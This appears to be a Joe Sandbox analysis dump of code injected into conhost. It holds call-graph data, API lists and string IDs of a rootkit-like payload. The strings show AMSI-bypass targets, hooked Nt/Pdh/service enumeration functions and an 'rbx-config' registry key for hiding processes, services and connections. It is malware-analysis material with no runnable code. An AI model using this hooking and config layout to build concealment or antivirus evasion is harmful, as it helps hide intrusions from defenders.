8693->8694 8694->8693 8182 1780dd2820c 8189 1780dd28f34 8182->8189 8185 1780dd28219 8190 1780dd29340 __CxxCallCatchBlock 9 API calls 8189->8190 8191 1780dd28215 8190->8191 8191->8185 8192 1780dd2c288 8191->8192 8193 1780dd2cb10 __free_lconv_num 13 API calls 8192->8193 8194 1780dd28222 8193->8194 8194->8185 8195 1780dd28f48 8194->8195 8198 1780dd292dc 8195->8198 8197 1780dd28f51 8197->8185 8199 1780dd292ed 8198->8199 8203 1780dd29302 8198->8203 8200 1780dd29c8c __CxxCallCatchBlock 6 API calls 8199->8200 8201 1780dd292f2 8200->8201 8204 1780dd29cd4 8201->8204 8203->8197 8205 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8204->8205 8206 1780dd29d02 8205->8206 8207 1780dd29d14 TlsSetValue 8206->8207 8208 1780dd29d0c 8206->8208 8207->8208 8208->8203 8930 1780dd28f0c 8937 1780dd2946c 8930->8937 8933 1780dd28f19 8938 1780dd29474 8937->8938 8940 1780dd294a5 8938->8940 8942 
1780dd28f15 8938->8942 8954 1780dd29d28 8938->8954 8941 1780dd294b4 __vcrt_uninitialize_locks DeleteCriticalSection 8940->8941 8941->8942 8942->8933 8943 1780dd29400 8942->8943 8959 1780dd29bfc 8943->8959 8955 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8954->8955 8956 1780dd29d5e 8955->8956 8957 1780dd29d68 8956->8957 8958 1780dd29d73 InitializeCriticalSectionAndSpinCount 8956->8958 8957->8938 8958->8957 8960 1780dd29aac __vcrt_InitializeCriticalSectionEx 5 API calls 8959->8960 8961 1780dd29c21 TlsAlloc 8960->8961 9122 1780dd25c8d 9123 1780dd25c94 9122->9123 9124 1780dd25cfb 9123->9124 9125 1780dd25d77 VirtualProtect 9123->9125 9126 1780dd25da3 GetLastError 9125->9126 9127 1780dd25db1 9125->9127 9126->9127 8209 1780dd34611 __scrt_dllmain_exception_filter 8963 1780dd2c510 8964 1780dd2c518 8963->8964 8965 1780dd2c545 8964->8965 8967 1780dd2c574 8964->8967 8968 1780dd2c59f 8967->8968 8969 1780dd2c582 DeleteCriticalSection 8968->8969 8970 1780dd2c5a3 8968->8970 8969->8968 8970->8965 8210 1780dd25ff9 8211 1780dd26000 VirtualProtect 8210->8211 8212 1780dd26029 GetLastError 8211->8212 8213 1780dd25f10 8211->8213 8212->8213 8214 1780dd241f9 8217 1780dd24146 8214->8217 8215 1780dd241b0 8216 1780dd24196 VirtualQuery 8216->8215 8216->8217 8217->8215 8217->8216 8218 1780dd241ca VirtualAlloc 8217->8218 8218->8215 8219 1780dd241fb GetLastError 8218->8219 8219->8217 8220 1780dd2cbfc 8225 1780dd2f3a0 8220->8225 8222 1780dd2cc05 8223 1780dd2cb10 __free_lconv_num 13 API calls 8222->8223 8224 1780dd2cc22 __vcrt_uninitialize_ptd 8222->8224 8223->8224 8226 1780dd2f3b1 8225->8226 8227 1780dd2f3b5 8225->8227 8226->8222 8227->8226 8228 1780dd2ef88 9 API calls 8227->8228 8228->8226 9128 1780dd3387c 9129 1780dd338b4 __GSHandlerCheckCommon 9128->9129 9130 1780dd338e0 9129->9130 9132 1780dd29a24 9129->9132 9133 1780dd29324 __CxxCallCatchBlock 9 API calls 9132->9133 9134 1780dd29a4e 9133->9134 9135 1780dd29324 __CxxCallCatchBlock 9 API calls 9134->9135 9136 1780dd29a5b 
9135->9136 9137 1780dd29324 __CxxCallCatchBlock 9 API calls 9136->9137 9138 1780dd29a64 9137->9138 9138->9130 8695 1780dd2c180 8698 1780dd2bf38 8695->8698 8705 1780dd2bf00 8698->8705 8706 1780dd2bf10 8705->8706 8707 1780dd2bf15 8705->8707 8708 1780dd2bebc 13 API calls 8706->8708 8709 1780dd2bf1c 8707->8709 8708->8707 8710 1780dd2bf2c 8709->8710 8711 1780dd2bf31 8709->8711 8712 1780dd2bebc 13 API calls 8710->8712 8713 1780dd2bebc 8711->8713 8712->8711 8714 1780dd2bef2 8713->8714 8715 1780dd2bec1 8713->8715 8716 1780dd2beea 8715->8716 8717 1780dd2d2a0 __free_lconv_num 13 API calls 8715->8717 8718 1780dd2d2a0 __free_lconv_num 13 API calls 8716->8718 8717->8715 8718->8714 8971 1780dd22300 8972 1780dd22331 8971->8972 8973 1780dd22412 8972->8973 8974 1780dd22447 8972->8974 8980 1780dd22355 8972->8980 8975 1780dd224bb 8974->8975 8976 1780dd2244c 8974->8976 8975->8973 8978 1780dd235c8 11 API calls 8975->8978 8988 1780dd235c8 GetProcessHeap HeapAlloc 8976->8988 8978->8973 8979 1780dd2238d StrCmpNIW 8979->8980 8980->8973 8980->8979 8982 1780dd21d30 8980->8982 8983 1780dd21d57 GetProcessHeap HeapAlloc 8982->8983 8984 1780dd21db4 8982->8984 8983->8984 8985 1780dd21d92 8983->8985 8984->8980 8986 1780dd21cfc 2 API calls 8985->8986 8987 1780dd21d9a GetProcessHeap HeapFree 8986->8987 8987->8984 8993 1780dd2361b 8988->8993 8989 1780dd236d9 GetProcessHeap HeapFree 8989->8973 8990 1780dd236d4 8990->8989 8991 1780dd23666 StrCmpNIW 8991->8993 8992 1780dd21d30 6 API calls 8992->8993 8993->8989 8993->8990 8993->8991 8993->8992 8994 1780dd2b500 8999 1780dd2c558 EnterCriticalSection 8994->8999 8229 1780dd2c828 8230 1780dd2c82d 8229->8230 8231 1780dd2c842 8229->8231 8235 1780dd2c848 8230->8235 8236 1780dd2c88a 8235->8236 8237 1780dd2c892 8235->8237 8238 1780dd2d2a0 __free_lconv_num 13 API calls 8236->8238 8239 1780dd2d2a0 __free_lconv_num 13 API calls 8237->8239 8238->8237 8240 1780dd2c89f 8239->8240 8241 1780dd2d2a0 __free_lconv_num 13 API calls 8240->8241 8242 1780dd2c8ac 8241->8242 8243 
1780dd2d2a0 __free_lconv_num 13 API calls 8242->8243 8244 1780dd2c8b9 8243->8244 8245 1780dd2d2a0 __free_lconv_num 13 API calls 8244->8245 8246 1780dd2c8c6 8245->8246 8247 1780dd2d2a0 __free_lconv_num 13 API calls 8246->8247 8248 1780dd2c8d3 8247->8248 8249 1780dd2d2a0 __free_lconv_num 13 API calls 8248->8249 8250 1780dd2c8e0 8249->8250 8251 1780dd2d2a0 __free_lconv_num 13 API calls 8250->8251 8252 1780dd2c8ed 8251->8252 8253 1780dd2d2a0 __free_lconv_num 13 API calls 8252->8253 8254 1780dd2c8fd 8253->8254 8255 1780dd2d2a0 __free_lconv_num 13 API calls 8254->8255 8256 1780dd2c90d 8255->8256 8261 1780dd2c6f8 8256->8261 8275 1780dd2c558 EnterCriticalSection 8261->8275 8719 1780dd233a8 8720 1780dd233cf 8719->8720 8721 1780dd2349c 8720->8721 8722 1780dd233ec PdhGetCounterInfoW 8720->8722 8722->8721 8723 1780dd2340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8722->8723 8724 1780dd23488 GetProcessHeap HeapFree 8723->8724 8725 1780dd23440 StrCmpW 8723->8725 8724->8721 8725->8724 8727 1780dd23455 8725->8727 8727->8724 8728 1780dd23950 StrCmpNW 8727->8728 8729 1780dd239f2 8728->8729 8730 1780dd23982 StrStrW 8728->8730 8729->8727 8730->8729 8731 1780dd2399b StrToIntW 8730->8731 8731->8729 8732 1780dd239c3 8731->8732 8732->8729 8738 1780dd21a30 OpenProcess 8732->8738 8735 1780dd23f88 StrCmpNIW 8736 1780dd239e4 8735->8736 8736->8729 8744 1780dd21cfc 8736->8744 8739 1780dd21ab6 8738->8739 8740 1780dd21a64 K32GetModuleFileNameExW 8738->8740 8739->8729 8739->8735 8741 1780dd21a7e PathFindFileNameW lstrlenW 8740->8741 8742 1780dd21aad CloseHandle 8740->8742 8741->8742 8743 1780dd21a9c StrCpyW 8741->8743 8742->8739 8743->8742 8745 1780dd21d13 8744->8745 8746 1780dd21d1c 8744->8746 8747 1780dd21530 2 API calls 8745->8747 8746->8729 8747->8746 8748 1780dd30fa8 8749 1780dd30fcc 8748->8749 8750 1780dd28070 _invalid_parameter_noinfo 8 API calls 8749->8750 8751 1780dd3100e 8750->8751 9147 1780dd2aaac 9148 1780dd2aad9 __except_validate_context_record 9147->9148 9149 1780dd29324 

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: d1c44051adfd5918ba11a262748e18ce0115dbb471029f5bff1d710b572d5a12
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 1D515C725A8A4AE7FB40DF69ED4E7EC6730AB60744F804512BC0D12566DE7C82DEC3A4

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 5449bceb9fac7a20e9a1c2bc2914edad5f5e1ecb01d48d5950d9a585fb409348
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: E6D067326E9640D7FB096F59EC9E3EC2271ABA4B01FC44425ED0E022A4DE2D85DD8360

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 000001780DD23A35
                                            • PathFindFileNameW.SHLWAPI ref: 000001780DD23A44
                                              • Part of subcall function 000001780DD23F88: StrCmpNIW.SHLWAPI(?,?,?,000001780DD2272F), ref: 000001780DD23FA0
                                              • Part of subcall function 000001780DD23EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23EDB
                                              • Part of subcall function 000001780DD23EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F0E
                                              • Part of subcall function 000001780DD23EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F2E
                                              • Part of subcall function 000001780DD23EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F47
                                              • Part of subcall function 000001780DD23EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F68
                                            • CreateThread.KERNELBASE ref: 000001780DD23A8B
                                              • Part of subcall function 000001780DD21E74: GetCurrentThread.KERNEL32 ref: 000001780DD21E7F
                                              • Part of subcall function 000001780DD21E74: CreateThread.KERNELBASE ref: 000001780DD22043
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22049
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22055
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22061
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD2206D
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22079
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22085
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 089838726ad3ddfdaf6dc4d96070e52b67a727f9541ff4bf26b067d5e2e7e576
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: D7111332A9C741C3FBB0AF60AA4D3FD62B0ABA4355F504129BC0E81191EE7CC4DC8630
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 21fc9abd0b96c54d7afed000eacec5839119025b438fb8b3b3788be1952ce631
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 1F916972B4515087DB54DF25D4087BDB3A1FB46B99F468028EE4E477C8EE34D896C720

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000001780DD21724: GetProcessHeap.KERNEL32 ref: 000001780DD2172F
                                              • Part of subcall function 000001780DD21724: HeapAlloc.KERNEL32 ref: 000001780DD2173E
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD217AE
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD217DB
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD217F5
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21815
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21830
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21850
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2186B
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD2188B
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD218A6
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD218C6
                                            • SleepEx.KERNELBASE ref: 000001780DD21BDF
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD218E1
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21901
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2191C
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD2193C
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21957
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21977
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21992
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2199C
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: f02d2cf167dda203577f8273320fd16ffbe57001577bb4de581be73cda7a7d63
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: C031CF7928C745C3EB549F26DD4D3FDA3B4AB64BC0F049421BE0D8769ADE28C8D89234

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: facbdbfb5c2bd2026e9ad8d46df58b599585430ca13e006f5fc0a7da37e4c6aa
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 43B15732258690C3EB698F26990D7EDA3B4FB65B94F44501AFE0D53B94DE3DC988C360
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 0d91ee97c88c6cbe6dd9bc3f2876700485e0cee5ee8d0f8abd147d7d7cbfc3c7
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 48312A76249B8086EB648F60E8587EE7374F784748F44442AEE4E47B98DF78C68CC720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: b27d6ded06ba6228c8eac93f1d2374ba410749ee9fa8e0e26f9ce94f5f475d03
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: C0414A37258B8087EB608F25E8493EE73B4F7887A4F540125EE8D46B99DF38C599CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 6d09a4e713bcf5874fb5220e5cd0fc4252d0a02e30dbf2e41e5de59597958237
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 15A1E33274C6808AFB209F75A84C7FD6BB2A7A5B94F144115AE8D27A99CE3CC4C9C750

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: d1af3ab047be10ac5fa37b96b0a24860e98f111ab63e272c0f8898280e10850b
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: A771F737294B51C6EB209F65E89D6ED23B4FB94B88F405221EE4D57B68DE39C488C360

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 80c95c9ac1173ddcc67762c0d4d7ee201d131de7aa9407c957e163cac6628e32
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: B6510632658B849BE724CF62E84D3AE77A1F788B98F448124EE4D47758DF3CC1898650

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: c4b2bfe7d71514561908e973b20ec2ade3c644f527c0fd213ff56bfb94d96315
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: D7518132788A4492FB159F66A94D3ED2270AB58BB0F480B25AD3D473D4DF3CD4898660

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                             • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
